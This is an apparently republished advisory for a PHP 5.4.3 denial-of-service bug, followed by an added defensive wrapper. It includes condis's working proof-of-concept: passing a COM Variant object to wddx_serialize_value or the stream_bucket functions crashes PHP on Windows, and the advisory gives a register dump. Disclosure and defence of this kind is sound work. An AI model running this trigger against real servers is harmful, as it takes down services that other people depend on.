Release date: -11
Vulnerability version: PHP 5.4.3
Vulnerability description:
Bugtraq ID: 53643
PHP is a server-side scripting language embedded in HTML documents. It plays a similar role to Microsoft's ASP, has a C-like syntax, and is widely used by web developers. PHP 5.4.3 and earlier contain multiple denial-of-service vulnerabilities caused by NULL pointer dereferences. An attacker who can pass a crafted argument to the affected functions can crash the PHP process.
Reference:
Condis
Test method (via Sebug.net):
The program (method) provided on this site may be offensive in nature and is intended only for security research and teaching. Use it at your own risk!
<?php

/*

PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference
Author : condis
Date : 10.04.2012 AD
Website : http://cond.psychodela.pl

----

Download : http://php.net/downloads.php

Tested on:

PHP 5.3.8 + Windows XP SP3 Professional PL
PHP 5.3.10 + Windows XP SP3 Professional PL
PHP 5.4.0 + Windows XP SP3 Professional PL
PHP 5.4.3 + Windows XP SP3 Professional PL

Description:

The wddx_serialize_value and wddx_serialize_vars functions fail to handle a Variant
object when it is given as the first argument.

Registers:

EAX 00000000
ECX 1056AAE8 php5ts.1056AAE8
EDX 100EFCE0 php5ts.100EFCE0
EBX 01032AB0
ESP 00C0FAE0
EBP 00000000
ESI 0121E478
EDI 0121CB50
EIP 1028F22E php5ts.1028F22E

Crash:

1028F22E 8A45 25 MOV AL,BYTE PTR SS:[EBP+25]

The situation looks pretty much the same for both wddx_serialize_vars and
wddx_serialize_value. The functions stream_bucket_prepend and stream_bucket_append
also have problems handling a Variant object when it is given as the second argument:

stream_bucket_append(1, new Variant(1));
stream_bucket_prepend(1, new Variant(1));

PS : The Variant object is only available in PHP for Windows and was implemented
in PHP > 4.1.0 and PHP 5.

For more details check : http://php.net/manual/en/class.variant.php

PS2: After running this via the webserver my Apache wasn't able to handle requests
anymore and I had to restart it :)

kthxbye

*/

// Trigger: a COM Variant object is passed where the WDDX serializer expects a
// plain value or array. On affected Windows builds the serializer reads through
// a NULL pointer (note EBP = 00000000 in the register dump above) and the PHP
// process dies.
wddx_serialize_value(new Variant(666));

?>
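A defensive wrapper, as an added example that is not part of the original advisory or of condis's PoC: it type-checks a value before handing it to wddx_serialize_value(), so objects of any class (including the Windows-only COM Variant that crashes PHP <= 5.4.3) are rejected with an exception instead of reaching the serializer. It assumes the wddx extension is loaded; the helper names and the sample inputs below are my own constructions.

```php
<?php
// Added example (not part of the original advisory or the PoC above).
// Allowlist-based guard for wddx_serialize_value(): only null, bool, int,
// float, string and arrays built from those are passed through. Every object,
// resource or closure is refused before the serializer ever sees it.

function is_plain_wddx_value($value, $depth = 0)
{
    // Bound the recursion so a deeply nested array cannot exhaust the stack.
    if ($depth > 64) {
        return false;
    }
    if ($value === null || is_bool($value) || is_int($value)
        || is_float($value) || is_string($value)) {
        return true;
    }
    if (is_array($value)) {
        foreach ($value as $key => $item) {
            // PHP array keys are always int or string, but check anyway so the
            // function documents exactly what it lets through.
            if (!is_int($key) && !is_string($key)) {
                return false;
            }
            if (!is_plain_wddx_value($item, $depth + 1)) {
                return false;
            }
        }
        return true;
    }
    // Objects (stdClass, Variant, ...), resources and closures end up here.
    return false;
}

function safe_wddx_serialize_value($value, $comment = null)
{
    if (!is_plain_wddx_value($value)) {
        throw new InvalidArgumentException(
            'refusing to WDDX-serialize a value that is not a scalar or an array of scalars'
        );
    }
    return $comment === null
        ? wddx_serialize_value($value)
        : wddx_serialize_value($value, $comment);
}

// Constructed demonstration inputs.
echo safe_wddx_serialize_value(array('a' => 1, 'b' => array(true, 'x', 2.5))), "\n";

try {
    safe_wddx_serialize_value(new stdClass());          // rejected on any OS
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}

// The PoC input. The Variant class only exists in Windows builds with the COM
// extension, so the check is skipped elsewhere.
if (class_exists('Variant')) {
    try {
        safe_wddx_serialize_value(new Variant(666));    // rejected instead of crashing
    } catch (InvalidArgumentException $e) {
        echo "rejected: ", $e->getMessage(), "\n";
    }
}
?>
```

Rejecting every object, rather than blocking Variant by name, is deliberate: WDDX only needs scalars and arrays, and an allowlist is easier to audit than a denylist of classes that happen to crash a given build. The same guard can sit in front of any serializer or stream helper that receives values the application does not fully control.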
Security suggestions:
Vendor patch: PHP --- the vendor has not yet provided a patch or upgrade for this issue. We recommend that you follow the vendor's home page and update to the latest version as soon as one becomes available: http://www.php.net
Note that triggering the crash requires executing PHP code that constructs a COM Variant object, so only Windows builds with the COM extension are affected, and the issue matters mainly where untrusted users can run PHP code (for example on shared hosting).